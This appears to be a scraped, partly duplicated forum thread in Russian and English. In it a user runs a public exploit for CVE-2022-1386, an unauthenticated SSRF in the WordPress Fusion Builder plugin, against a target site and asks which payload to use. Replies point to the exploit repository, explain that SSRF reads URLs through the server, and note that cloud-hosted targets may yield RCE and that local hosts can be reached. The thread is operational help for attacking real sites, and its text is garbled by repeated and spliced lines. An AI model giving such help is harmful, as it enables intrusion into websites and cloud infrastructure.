бью урл этим сплойтом, пробивает, просит пейлод, какой пейлод или фреймворк юзать?
Не переобулся а изменил свою точку зренияHey, friend! Here's the second result on Google! https://github.com/ardzz/CVE-2022-1386. Here, you have a python script, that is incredibly easy to use. Good luck bro! Let me know if you need any more help!
ссылку на то что хочешь чтоб сплойт отобразил. https://google.com/ к примеру или какой хост из локальной сетибью урл этим сплойтом, пробивает, просит пейлод, какой пейлод или фреймворк юзать?
root@user:~/CVE-2022-1386# python3 CVE-2022-1386.py
CVE-2022-1386 - Fusion Builder < 3.6.2 - Unauthenticated SSRF
___ ____ ___ ___ ________ ____ _____
|__ \ / __ \__ \|__ \ < /__ /( __ )/ ___/
__/ // / / /_/ /__/ /_____/ / /_ </ __ / __ \
/ __// /_/ / __// __/_____/ /___/ / /_/ / /_/ /
/____/\____/____/____/ /_//____/\____/\____/
[>] Target URL: http://ччччччччю/wp-admin/admin-ajax.php
[+] Testing SSRF...
[+] Target is vulnerable to SSRF!
[+] Saving raw request...
[+] Raw request saved to output/ folder
[>] Payload: Какой пейлод юзать?
Ну если гуглить умеешь. Найди разъяснение))) Ты написал "какой payload сюда" я тебе скинул)гуглить и я умею, как это юзать?
the URL you are trying to read the response of, if the website is hosted on a cloud server, you can get rce, if not, likely useless unless they have custom scripts or other services on localroot@user:~/CVE-2022-1386# python3 CVE-2022-1386.py
CVE-2022-1386 - Fusion Builder < 3.6.2 - Unauthenticated SSRF
___ ____ ___ ___ _______ ____ _____
|__ \ / __ \__ \|__ \ < /__ /( __ )/ ___/
__/ // / / /_/ /__/ /_____/ / /_ </ __ / __ \
/ __// /_/ / __// __/_____/ /___/ / /_/ / /_/ /
/____/\____/____/____/ /_//____/\____/\____/
[>] Target URL: http://www.wp-admin/admin-ajax.php
[+] Testing SSRF...
[+] Target is vulnerable to SSRF!
[+] Saving raw request...
[+] Raw request saved to output/folder
[>] Payload: What payload should I use?
експйлойт пробивает урл, какой пейлод юзать? что я могу из этого получить, сессию метерпретер?the URL you are trying to read the response of, if the website is hosted on a cloud server, you can get rce, if not, likely useless unless they have custom scripts or other services on local
SSRF exploit = you can make HTTP request on behalf of the web serverexpyloit breaks url, what payload to use? what can I get out of this, meterpreter session?
то есть я могу редактировать index.html?SSRF exploit = you can make HTTP request on behalf of the web server
means you give URL (https://example.com)
and you see the HTML, response of https://example.com
that is what the vulnerability is, you will likely not escalate this on wordpress